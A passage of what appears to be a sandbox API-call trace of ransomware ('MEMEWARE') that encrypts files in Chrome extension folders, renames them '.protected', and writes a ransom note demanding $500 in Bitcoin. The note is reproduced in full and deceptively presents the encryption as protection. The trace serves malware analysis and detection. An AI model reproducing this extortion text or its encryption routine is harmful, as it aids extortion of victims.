out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\.") returned 143 [0081.553] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.553] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.553] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.553] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.553] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.553] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.553] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.553] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\..") returned 144 [0081.553] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.553] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.553] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.553] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.553] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.553] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.553] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.553] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.553] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json") 
returned 155 [0081.553] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.553] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.553] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.553] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.553] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json") returned 155 [0081.553] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.553] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json") returned 155 [0081.553] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.553] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json") returned 155 [0081.553] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.553] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe8, lpOverlapped=0x0) returned 1 [0081.554] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.554] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe8, lpOverlapped=0x0) returned 1 [0081.554] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.554] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.554] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.555] CloseHandle (hObject=0x168) returned 1 [0081.555] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.protected") returned 165 [0081.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.protected")) returned 1 [0081.555] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.555] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.555] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\RESTORE_FILES.txt") returned 159 [0081.555] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.556] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.556] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.556] lstrlenA (lpString="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") returned 684 [0081.556] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.556] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.556] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.556] CloseHandle (hObject=0x164) returned 1 [0081.556] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.556] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0081.556] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0081.556] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0081.557] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0081.557] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0081.557] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN") returned 144 [0081.557] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0081.557] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0081.557] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\*") returned 146 [0081.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.557] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.557] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.557] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.557] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.557] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.557] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\.") returned 146 [0081.557] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.557] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.557] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.557] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.557] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.557] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.557] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.557] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\..") returned 147 [0081.557] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.557] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.557] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.557] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.557] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.557] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.557] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.557] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.557] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0081.557] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.557] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.557] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.557] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0081.558] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0081.558] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0081.558] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.558] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x102, lpOverlapped=0x0) returned 1 [0081.558] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.558] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x102, lpOverlapped=0x0) returned 1 [0081.559] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.559] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.559] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.559] CloseHandle (hObject=0x168) returned 1 [0081.559] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.protected") returned 168 [0081.559] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0081.559] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.559] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.559] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 162 [0081.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.560] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.560] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.561] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.561] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.561] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.561] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.561] CloseHandle (hObject=0x164) returned 1 [0081.561] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.561] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0081.561] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0081.561] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0081.561] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0081.561] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0081.561] 
wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW") returned 144 [0081.561] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0081.561] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0081.561] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\*") returned 146 [0081.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.561] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.561] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.561] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.561] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.561] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.561] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\.") returned 146 [0081.562] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.562] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.562] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.562] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.562] lstrcmpiW (lpString1="..", lpString2="Program Files 
(x86)") returned -1 [0081.562] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.562] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.562] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\..") returned 147 [0081.562] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.562] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.562] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.562] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.562] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.562] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 